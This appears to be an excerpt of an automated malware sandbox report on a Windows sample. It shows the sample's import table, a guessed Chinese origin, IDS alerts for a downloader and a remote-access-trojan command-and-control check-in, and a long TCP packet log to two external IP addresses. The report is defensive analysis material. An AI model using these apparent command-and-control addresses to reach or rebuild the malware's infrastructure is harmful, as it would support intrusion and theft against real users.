GetTickCount, SetEnvironmentVariableA, Sleep, LoadLibraryA, GetLogicalDriveStringsW, GetLastError, CreateMutexW, ExpandEnvironmentStringsA
                                                              USER32.dllGetWindowRect, MessageBoxA, GetProcessWindowStation, GetUserObjectInformationW, ShowWindow, SetTimer, IsWindow, IsZoomed, KillTimer, SetWindowPos, GetSystemMenu, PostQuitMessage, GetWindowLongW, DefWindowProcW, wsprintfW, RegisterClassW, CreateWindowExW, UnregisterClassW, SetWindowLongW, DestroyWindow, IsIconic, GetMonitorInfoW, MonitorFromWindow, GetMessageW, TranslateAcceleratorW, TranslateMessage, EnableMenuItem, DispatchMessageW, PostMessageW, ScreenToClient, GetClientRect, SetWindowRgn, GetWindowTextW, GetWindowTextLengthW, SetWindowTextW, InvertRect, InvalidateRgn, CreateAcceleratorTableW, SetScrollRange, CreateCaret, MessageBoxW, GetWindow, EnableWindow, SetFocus, ClientToScreen, GetSysColor, RegisterWindowMessageW, LoadImageW, GetSystemMetrics, SendMessageW, HideCaret, ShowCaret, LoadCursorW, GetClassInfoExW, RegisterClassExW, CallWindowProcW, SetPropW, GetPropW, GetKeyState, ReleaseDC, GetDC, GetUpdateRect, BeginPaint, EndPaint, IsRectEmpty, UpdateLayeredWindow, InvalidateRect, MapWindowPoints, GetCursorPos, GetFocus, SetCapture, ReleaseCapture, SetCaretPos, MoveWindow, CharPrevW, SetRect, FillRect, DrawTextW, CharNextW, IntersectRect, SetCursor, InflateRect, OffsetRect, GetParent, PtInRect
                                                              GDI32.dllTextOutW, GetTextExtentPoint32W, GetCharABCWidthsW, RoundRect, LineTo, MoveToEx, CreatePenIndirect, CreateSolidBrush, ExtTextOutW, SetStretchBltMode, SetBkMode, SetBkColor, SetTextColor, StretchBlt, CreateDIBSection, CombineRgn, ExtSelectClipRgn, CreateRectRgnIndirect, GetClipBox, SelectClipRgn, GetObjectA, GetTextMetricsW, SetWindowOrgEx, Rectangle, BitBlt, RestoreDC, SaveDC, SelectObject, CreateCompatibleBitmap, CreateCompatibleDC, DeleteDC, CreatePen, CreateFontIndirectW, GetStockObject, GetObjectW, DeleteObject, CreateRoundRectRgn, GetDeviceCaps
                                                              ADVAPI32.dllRegSetValueExW, RegCloseKey, RegOpenKeyExW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegQueryValueExW, DeregisterEventSource, ReportEventA, RegisterEventSourceA
                                                              SHELL32.dllShellExecuteW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetSpecialFolderLocation
                                                              ole32.dllCoInitialize, OleInitialize, OleUninitialize, CoUninitialize, CoTaskMemFree, CoCreateInstance, CLSIDFromProgID, OleLockRunning, CLSIDFromString, RevokeDragDrop, RegisterDragDrop
                                                              OLEAUT32.dllVariantInit, SysFreeString, VariantClear, SysAllocString, SysAllocStringLen
                                                              gdiplus.dllGdipFree, GdipAlloc, GdipCloneBrush, GdipDrawString, GdipCreateBitmapFromHBITMAP, GdipDisposeImage, GdipSetSmoothingMode, GdipCreatePath, GdipDeletePath, GdipAddPathArcI, GdipAddPathLineI, GdipCreateTexture, GdipSetPixelOffsetMode, GdipFillPath, GdiplusStartup, GdiplusShutdown, GdipCreateFontFromDC, GdipCreateFontFromLogfontA, GdipCreateLineBrushI, GdipSetStringFormatLineAlign, GdipSetStringFormatAlign, GdipDeleteStringFormat, GdipCreateStringFormat, GdipSetTextRenderingHint, GdipDeleteGraphics, GdipCreateFromHDC, GdipDeleteFont, GdipDeleteBrush
                                                              SHLWAPI.dllPathRemoveFileSpecW, PathAppendW, PathFileExistsW
                                                              MSIMG32.dllAlphaBlend
                                                              WINMM.dlltimeBeginPeriod, timeEndPeriod
                                                              COMCTL32.dllInitCommonControlsEx, _TrackMouseEvent
                                                              PSAPI.DLLGetModuleFileNameExW
                                                              snmpapi.dllSnmpUtilOidNCmp, SnmpUtilVarBindFree, SnmpUtilOidCpy
                                                              IPHLPAPI.DLLGetAdaptersAddresses
                                                              WS2_32.dllWSAStartup, gethostname, WSACleanup, gethostbyname, inet_ntoa, inet_addr, socket, WSACreateEvent, WSAEventSelect, htons, sendto, WSAWaitForMultipleEvents, WSAEnumNetworkEvents, recvfrom, ntohs, ntohl, setsockopt, closesocket, WSAGetLastError, select, ioctlsocket, listen, accept, getservbyport, WSASetLastError, __WSAFDIsSet, recv, send, WSAIoctl, getsockname, bind, getsockopt, getpeername, connect, htonl, getservbyname, gethostbyaddr, shutdown
                                                              WLDAP32.dll

                                                              Possible Origin

                                                              Language of compilation systemCountry where language is spokenMap
                                                              ChineseChina

                                                              Network Behavior

                                                              Suricata IDS Alerts

                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-09-20T12:00:03.881032+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549723104.21.22.8880TCP
                                                              2024-09-20T12:00:37.291075+02002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.549726202.79.173.480TCP

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Sep 20, 2024 12:00:03.125685930 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.130944967 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.131064892 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.131304026 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.136718035 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.880932093 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.880951881 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.880970001 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.880985975 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.881000042 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.881016016 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.881031990 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.881031990 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.881031990 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.881047010 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.881062984 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.881081104 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.881124020 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.881124973 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.881124973 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.881124973 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.881124973 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.885979891 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.886013031 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.886050940 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.886089087 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.886321068 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.886377096 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.966974020 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.967004061 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.967014074 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.967128992 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.967153072 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.967205048 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.971848011 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.971867085 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.971898079 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.971914053 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.971915007 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.971937895 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.971946955 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.971976042 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.976603031 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.976623058 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.976659060 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.976687908 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.976844072 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.976861000 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.976898909 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.976949930 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.981328964 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.981349945 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.981364965 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.981390953 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.981390953 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.981420040 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.981561899 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.981579065 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.981617928 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.981617928 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.986077070 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.986097097 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.986133099 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.986167908 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.986268997 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.986287117 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.986325979 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.986325979 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.990793943 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.990812063 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.990825891 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:03.990847111 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.990876913 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:03.990876913 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.053194046 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.053216934 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.053234100 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.053248882 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.053276062 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.053277016 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.053359985 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.058033943 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.058053970 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.058068037 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.058094025 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.058130026 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.058204889 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.058222055 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.058235884 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.058259010 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.058291912 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.062973976 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.062990904 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.063038111 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.063076973 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.063105106 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.063122034 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.063158989 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.063159943 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.067764044 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.067783117 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.067800045 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.067819118 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.067866087 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.067866087 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.067944050 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.067960978 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.067996979 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.068028927 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.072559118 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.072577953 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.072618961 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.072648048 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.072705030 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.072721958 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.072761059 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.072793007 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.077354908 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.077372074 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.077388048 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.077411890 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.077445030 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.077624083 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.077649117 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.077680111 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.077711105 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.082173109 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.082194090 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.082232952 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.082278967 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.082452059 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.082468987 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.082506895 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.082534075 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.086961031 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.086990118 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.087029934 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.087029934 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.087234020 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.087258101 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.087272882 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.087294102 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.087294102 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.087321043 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.091737032 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.091758966 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.091816902 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.091816902 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.139342070 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.139364004 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.139380932 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.139406919 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.139421940 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.139424086 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.139478922 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.139480114 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.139558077 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.139611006 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.139688969 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.139710903 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.139728069 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.139735937 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.139744043 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.139760971 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.139761925 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.139787912 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.139787912 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.139815092 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.140530109 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.140585899 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.140604019 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.140626907 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.140634060 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.140634060 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.140644073 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.140666008 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.140685081 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.141501904 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.141520023 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.141535044 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.141567945 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.141568899 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.141573906 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.141591072 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.141592026 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.141632080 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.141632080 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.142193079 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.142240047 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.142251968 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.142256975 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.142277002 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.142297029 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.142309904 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.142316103 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.142350912 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.142350912 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.143042088 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.143093109 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.143100977 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.143110991 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.143151999 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.143151999 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.143168926 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.143193007 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.143235922 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.143235922 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.143867016 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.143918991 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.143920898 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.143944025 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.143968105 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.143992901 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.144054890 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.144071102 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.144108057 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.144108057 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.144773960 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.144795895 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.144819975 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.144821882 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.144835949 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.144845963 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.144854069 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.144871950 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.144872904 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.144893885 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.145566940 CEST8049723104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.145623922 CEST4972380192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.311463118 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.316864967 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:04.316991091 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.317171097 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:04.322166920 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.429286957 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.429848909 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.429980993 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.432626963 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.437767982 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.540324926 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.540395975 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.540412903 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.540427923 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.540442944 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.540457964 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.540463924 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.540474892 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.540491104 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.540499926 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.540509939 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.540522099 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.540527105 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.540535927 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.540565014 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.541400909 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.541424990 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.541469097 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.545609951 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.545882940 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.545933962 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.630783081 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.630805016 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.630814075 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.631016016 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.631237984 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.631283045 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.631299973 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.631302118 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.631316900 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.631335974 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.631339073 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.631438017 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.631494045 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.631557941 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.631572962 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.631588936 CEST8049724104.21.22.88192.168.2.5
